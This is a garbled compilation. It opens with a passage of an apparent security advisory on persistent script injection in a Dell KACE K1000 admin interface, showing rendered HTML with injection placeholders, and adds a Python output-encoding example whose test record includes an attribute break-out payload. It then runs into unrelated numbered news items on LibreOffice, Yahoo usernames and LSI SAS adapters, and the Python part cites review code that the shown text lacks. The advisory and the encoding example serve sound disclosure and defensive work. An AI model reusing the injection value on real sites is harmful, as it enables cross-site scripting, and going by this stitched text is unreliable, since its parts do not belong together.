<option value="NOT_ENDS_WITH" title="does not end with">does not end with</option>
<option value="NOT_MATCH_REGEX" title="does not match REGEX">does not match REGEX</option>
<option value="ENDS_WITH" title="ends with">ends with</option>
<option value="NOT_NULL" title=" is NOT NULL">is NOT NULL</option>
<option value="NULL" title="is NULL">is NULL</option>
<option value="MATCH_REGEX" title="matches REGEX">matches REGEX</option>
</select>
</td>
<td class="inputFormat"><input class="inputFormat" name="FINDFIELDS[INPUT8]" id="FINDFIELDS[INPUT8]" value="" size="46" maxlength="255" /></td>
</tr>
<tr>
<td colspan="4" align="center" class="inputFormat">
Choose label:
<select name="FINDFIELDS[FILTER_LABEL]" dojoType="dijit.form.ComboBox">
<script type="dojo/connect"> this.attr("value","");</script>
<option selected value="" title=""></option>
<option value="77" title="">[PERSISTENT INJECTED SCRIPT CODE!]" >">[PERSISTENT INJECTED SCRIPT CODE!]</option>
</select>
<input name="test_filter" class="inputFormatButton" type="submit" value="Test Smart Label" />
<input name="create_filter" class="inputFormatButton" type="submit" value="Create Smart Label" />
<input
name="cancel" class="inputFormatButton" type="reset" value="Reset" onclick="document.createFilterForm.reset(); return true;" />
</td>
</tr>
</table>
</form>
</div>
</div>
<div id="createNotifyForm" class="advQueryOuter">
<div class="advQueryInner">
<h2>Create Email Notification</h2>
<p>To create a notification rule simply enter the search criteria, title, email recipient - then Test & Create:</p>
<form name="createNotifyForm" action="/adminui/advanced_query.php" method="post" onreset="fieldsReset(); fieldsOnchange();">
<table border="0" cellspacing="0" cellpadding="0" style="margin-left: auto; margin-right: auto;" align="center">
<tr>
...

1.3
URL: https://pub23.127.0.0.1:1336/adminui/settings_network_scan.php
Affected module: Distribution => Wake-on Lan => Exception handling

Code Review:
<p>
<b><u>Wake-on-LAN</u></b>
<br/><br/>
This page allows you to wake up a computer or other device that has been inventoried by the K1000 if the remote device is attached to the network and supports Wake-on-LAN. If the device you wish to wake is not inventoried by the K1000 but you still know the MAC (Hardware) address and its last-known IP address, you can manually enter the info to wake the device.
</p>
<div class="roundbottom">
<img src="./images/RoundRectBottomLeft.gif" alt="" width="15" height="15" class="corner" style="display: none;">
</div>
</div>
<span class="filtercount" style="display:none" id="hidden_machine_picker_count"></span>
<span class="filtercount" style="display:none " id="hidden_device_picker_count"></span>
<form class="edit" action="" method="post" target="_self" />
<div class="wordwrap messageBox">
<span class="messageBoxTitle">Please correct the following errors:</span><ul><li class="error">A Wake-on-LAN packet was sent to wake <strong>[PERSISTENT INJECTED SCRIPT CODE!] ([PERSISTENT INJECTED SCRIPT CODE!])</strong>.
</li><li class="error">Please note that it may take several minutes for the device to power on and be available for use.</li></ul></div>
<table cellspacing="1" cellpadding="0" border="0">
<tr>
<td colspan="2" class="inputFormat"><h2>Wake Multiple Devices</h2></td>
</tr>
<tr>
<td class="inputFormat" style="width: 30%; vertical-align:middle;">Limit To Selected Labels:</td>
<td width="70%">
<select name="label" style="width: 30em" onchange="updateFields(this)" id="label">
<option selected value="" title="Select a label…">Select a label…</option>
<option value="77" title="">[PERSISTENT INJECTED SCRIPT CODE!]">">[PERSISTENT INJECTED SCRIPT CODE!]</option>
<option value="72" title="Adobe Flash Player">Adobe Flash Player</option>
<option value="71" title="Adobe Reader X">Adobe Reader X</option>
<option value="49" title="All Ticket Owners">All Ticket Owners</option>
<option value="33" title="MemberOfBuildingA">MemberOfBuildingA</option>
<option value="32" title="MemberOfFinanceGroup">MemberOfFinanceGroup</option>
<option value="64" title="Windows 7 - Critical - 2012">Windows 7 - Critical - 2012</option>
<option value="65" title="Windows XP - Critical - 2012">Windows XP - Critical - 2012</option>
</select>
</td>
</tr>
<tr>
<td colspan="2" class="inputFormat"><img src="/adminui/images/timer_16x16.gif" alt="" height="16" width="16" border="0" /> <a href="wol_list.php">Schedule a routine Wake-on-LAN event</a></td>
</tr>
<tr>
<td colspan="2" height="10px"></td>
</tr>
<tr>
<td colspan="2" class="inputFormat"><h2>Wake a Computer</h2></td>
</tr>
<tr>
<td class="inputFormat" style="width: 140px; max-width: 140px; vertical-align:middle;">Limit To Listed Machines:</td>
<td>
<select name="machine[]" size="7" multiple="1" id="machine[]" style="width:30em">
<option value="0" title="----- Machine Names -----">----- Machine Names -----</option>
</select>
<input class="inputFormat" type="button" value="Remove" onclick="machineRemoveSelected()" />
<input class="inputFormat" type="button"
value="Remove All" onclick="machineRemoveAll()" />
</td>
</tr>
<tr>
<td height="10px"></td>
<td valign="bottom">
<select name="" id="machine_picker" style="width:30em" onchange="machineAddNameToList(this); this.selectedIndex = 0; ">
<option value="" title="Loading...">Loading...</option>
</select>

Risk:
=====
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed [ibrahim@evolution-sec.com]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.
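The three rendering contexts the code review above shows injected inventory values landing in (a <td> text node, an option title="..." attribute, and the JS string arguments of the onchange="MachineAction('...')" handler) each need their own output encoding. The following is an added example in Python, not Dell KACE code or part of the advisory: the concatenation pattern the advisory describes next to a context-aware encoded version, plus a check that no stored markup survives into the page. The field names and the sample record are constructed.

```python
"""Context-aware output encoding for the three contexts the advisory's
code review shows stored inventory values being rendered into: an HTML
text node (<td>...</td>), a double-quoted attribute (title="...") and a
JavaScript string literal inside an onchange="MachineAction('...')"
attribute. Added example, not Dell KACE code; the field names and the
sample record are constructed for illustration."""
import html
import json

# Constructed record: "name" and "ip" carry the <h1> markup visible in the
# advisory's rendered page, "os" carries an attribute break-out attempt.
SAMPLE_MACHINE = {
    "name": "<h1>Name</h1>",
    "ip": "<h1>Ip-Address</h1>",
    "os": 'Windows 7" onmouseover="alert(1)',
}


def html_encode(value: str) -> str:
    """Encode for an HTML text node or a quoted attribute value.
    Escaping quotes inside a text node is harmless, so one routine serves both."""
    return html.escape(value, quote=True)


def js_string_in_attr(value: str) -> str:
    """Encode for a JS string literal that itself sits inside an HTML
    attribute. Two layers are needed: first a safe JS literal (json.dumps
    quotes and escapes it; < and > are additionally \\u-escaped so no tag
    can appear in the output), then HTML-encoding, because the browser
    decodes the attribute before the JS engine ever sees it."""
    literal = json.dumps(value)
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e")
    return html.escape(literal, quote=True)


def render_row_unsafe(m: dict) -> str:
    """The pattern the advisory describes: raw values concatenated into markup."""
    return ('<tr><td>IP Address:</td><td>' + m["ip"]
            + ' <select onchange="MachineAction(\'' + m["ip"] + '\',\''
            + m["name"] + '\')"><option title="' + m["os"] + '">'
            + m["os"] + '</option></select></td></tr>')


def render_row_safe(m: dict) -> str:
    """Same markup, each value encoded for the context it lands in."""
    return ('<tr><td>IP Address:</td><td>' + html_encode(m["ip"])
            + ' <select onchange="MachineAction(' + js_string_in_attr(m["ip"])
            + ',' + js_string_in_attr(m["name"]) + ')"><option title="'
            + html_encode(m["os"]) + '">' + html_encode(m["os"])
            + '</option></select></td></tr>')


def leaks_raw_markup(rendered: str, values) -> bool:
    """Review/template-test check: does any stored value containing markup
    or quote characters appear verbatim in the output, i.e. did it break
    out of the context it was placed in?"""
    return any(v in rendered for v in values if any(c in v for c in '<>"\''))


if __name__ == "__main__":
    vals = SAMPLE_MACHINE.values()
    print("unsafe row leaks markup:", leaks_raw_markup(render_row_unsafe(SAMPLE_MACHINE), vals))
    print("safe row leaks markup:  ", leaks_raw_markup(render_row_safe(SAMPLE_MACHINE), vals))
```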
21. Analysis

A senior bod behind LibreOffice says the open-source suite's spreadsheet app lags behind much-nippier rival Microsoft Excel - but the hardware acceleration announced this month should close that gap. And that acceleration could give the freely available productivity suite a leg up on tablets, smartphones and other mobile gadgets, too.

As reported earlier this month, LibreOffice will be updated to hook into AMD's HSA technology: this grants graphics chips access to memory allocated to applications, allowing the hardware to easily and rapidly crunch through program data while the system's general-purpose processors work on other things. Ultimately, HSA-aware software should run faster, provided suitable silicon is present, by offloading work onto the graphics processor, which may otherwise be sitting mostly idle.

Last week, LibreOffice maker the Document Foundation admitted AMD to its ranks of advisory board members; other bedfellows include Intel, Red Hat, SuSE and Google. Version 4.2 of the suite, due out in February next year, should support the GPU-powered acceleration thanks to contributions from AMD engineers and others.

“Spreadsheet has traditionally been pretty weak in LibreOffice from a performance and memory perspective. We want to fix that and make it really good,” Document Foundation board member, SuSE staffer and Linux desktop architect Michael Meeks told The Reg. “We have had a performance gap with Microsoft in the past and we are eager to close that.

“People build spreadsheets to crunch data to the point of boredom - bigger and bigger and slower and slower. We can make a tool that’s bigger and let them crunch more data in rich ways."

Once on a par with Excel, at least in terms of speed and memory use, LibreOffice can hope to attract that hard-to-catch beast: the desktop spreadsheet power user, traditionally a Microsoft Office animal.
The open-source suite's spreadsheet app is undergoing “huge structural changes”, we're told, with code rewritten and with systematic unit testing. “That should put us back in the spreadsheet game in my view,” Meeks reckoned.

But isn’t the spreadsheet war over, and didn’t Microsoft win with Excel? “There are loads of ways to put us back in the spreadsheet game, in my view,” said Meeks.

One such way, perhaps, is getting the gear onto smaller devices, such as tablets, whose popularity is mushrooming. The aforementioned hardware acceleration could give heavyweight LibreOffice an edge on trendy handheld gear as well as boring old PCs: a coalition of tech firms including AMD, ARM, Qualcomm, Texas Instruments and Samsung are part of the non-profit HSA Foundation, which is working on an open specification for the GPU-CPU sharing technology on a wide range of fondleslabs and other systems.

HSA-aware code is written in a new platform-independent language called HSAIL, which runs in a virtual machine and thus allows a program to comfortably target a host of compatible HSA hardware. Given the number of mobile processor designers and manufacturers in AMD's foundation, hardware acceleration for mobile gear is on the cards.

ARM ports of LibreOffice do exist, but these are targeted at mini-beasts such as the Raspberry Pi. For handhelds, Android and iOS ports of LibreOffice are being worked on, but they are still at a preliminary stage – as is a browser version of the suite: an HTML5 version was first discussed in 2011. The Document Foundation needs cash to finish that off as well as someone to provide the servers on which the backend of the web version runs.

There’s just two modes for the Android and iOS ports – viewer and full-office suite - and there’s some initial touchscreen support with pan and zoom and minimal editing.
Meeks concedes there are “formidable user interface problems around touch”, adding that with a “couple of people” and a partner to fund the work it would be done “in a couple of months”. One big problem remains, however: the full LibreOffice suite, at 50MB, is currently too big for download to mobile, realistically.

'We have a long way to go but we are getting there'

It’s been two and a half years since LibreOffice was formed in a fork from the Oracle-controlled OpenOffice, and the Document Foundation has been concentrating on the basics ever since: fixing bugs and ripping out old code gone to seed.

The latest version, 4.0 released in February, had better handling of file formats and improved interoperability with Microsoft Office; 275 out of 500 dialogue boxes were cleaned up; and thousands of unused methods and code resembling ASCII art were thrown out. In fact, nine million new lines of code were added to 4.0, and 12 million taken out, we're told. (It has about seven million lines of code under version control as of right now.) Up to 15,000 quality assurance tests have been run on the new code to detect any crash-causing scenarios.

“There was a huge build up of technical debt in the code base and people would do appalling hacks to avoid re-factoring and doing it right," said Meeks. "We are finally starting to do things right ... these days we are doing more exhaustive changes and we hope to get it right with more manageable code in the long term.

“In the past there was this fear of breaking things that were culturally engrained. Now, there’s a nuanced view that if you break something perhaps that’s good because you need to change something. I think people enjoy this level of code clean up, it's satisfying. We write unit tests to limit the breaks.”

There will come a point at which the changes to LibreOffice become so significant that the suite will no longer simply be an OpenOffice fork. That time will come soon, judging by raw numbers and momentum.
Black Duck’s Ohloh developer-monitoring service counts 350 programmers and 20,700 code commits for LibreOffice over the last 12 months, versus 50 devs and 4,900 commits for OpenOffice. Also, OpenOffice's source code is released under an Apache Software Foundation (ASF) licence while LibreOffice is available under the GNU LGPL; Apache won’t accept code contributions from non-ASF licences, meaning OpenOffice is cut off from LibreOffice's changes.

“It’s clearly a similar code base – these are members of the same family, and for a long time they will have to be like that,” said Meeks.

The new and improved code should dovetail into these grander plans to speed up the software, reduce its footprint, and make it easier to update for more platforms in the future.

Will LibreOffice finally offer something credible to Microsoft Office? We've been down this route too many times to do anything other than roll our eyes, at least at this stage. Smartphones, tablets and browser-based suites have everything to play for as the traditional desktop gets left behind. (But don't forget Microsoft Office is coming to iPhones, iPads and iPods, as well as Redmond's Surface tablets.)

One thing is certain, however: with so much going on, LibreOffice will look less like OpenOffice. And it won't necessarily be the big platform stuff that will transform LibreOffice. It's the state of the code inside.

“We have a long way to go but we are getting there and that’s encouraging,” Meeks said of tidying up, refactoring and testing. Still, there is excitement surrounding even the smallest changes; something that's much better than the last days of the OpenOffice Empire under the moribund Sun Microsystems, and later Oracle.

“You wake up and you are excited. It’s much better than it was,” said Meeks.

Source: TheRegister.co.uk
22. INTERNET PORTAL Yahoo is letting people grab expired usernames on its service, meaning that if you want it and missed out the first time, you can stake a claim on something like dave@yahoo.com.

Last month the firm announced that it would make usernames that have not been used in the last 12 months available to anyone that wants them.

"We're freeing up [user] IDs, that have been inactive for at least 12 months, by resetting them and giving them a fresh start. In mid July, anyone can have a shot at scoring the Yahoo ID they want," said the firm in mid-June. "In mid-August, users who staked a claim on certain IDs can come to Yahoo to discover which one they got."

Well, now it's mid-July and the firm is letting punters stake their claims.

"Last month, we told you about being able to grab the Yahoo username of your dreams, where the first step was letting people keep their account by logging in if they hadn't in the past year," said Dylan Casey, senior director for platforms at Yahoo. "That part is over, so it's time for you to start filling out your wish list."

We had a go. You can choose as many as five different names and will be notified of any success in mid-August.

Yahoo said that it will work with social media websites, or anywhere where its email addresses might be used, to ensure that the new owners will have the correct levels of access.

Source: TheInquirer.net
23. LSI has begun shipping its first 12Gbps SAS adapters for storage arrays, servers and workstations, doubling the prevailing 6Gbps SAS data rate.

LSI's SAS 9300 HBA (Host Bus Adapter) runs at 12Gbit/sec, delivers over 1 million IOPS through a PCIe 3.0 connection to hosts, and comes in four versions:

- 9300-8e with 8 ports
- 9300-8i with 8 ports
- 9300-4i4e with 8 ports
- 9300-4i with 4 ports

Maximum throughput is claimed to be more than 6GB/sec when streaming. Each HBA uses either an LSI SAS 3008 or 3004 controller, has the SAS 3.0 standard-specified mini-SAS HD connectors and their low-profile form factor supports 8 PCIe 3.0 lanes.

Page 6 of LSI's Storage Adapter Guide (pdf) lists various characteristics of the 8i, 8e, 4i-4e, and 4i models. We envisage that LSI will bring out a 12Gbit/s SAS switch to follow on from its 6160 SAS 2.0 switch product.

[Image caption: LSI SAS 9300 HBA, which runs at 12Gbit/s]

Pricing starts from $245 for a single 9300-4i and all the products are available now. If your apps are hung up on 6gig SAS connectors not being fast enough, then here's one route out of that trap.

Source: TheRegister.co.uk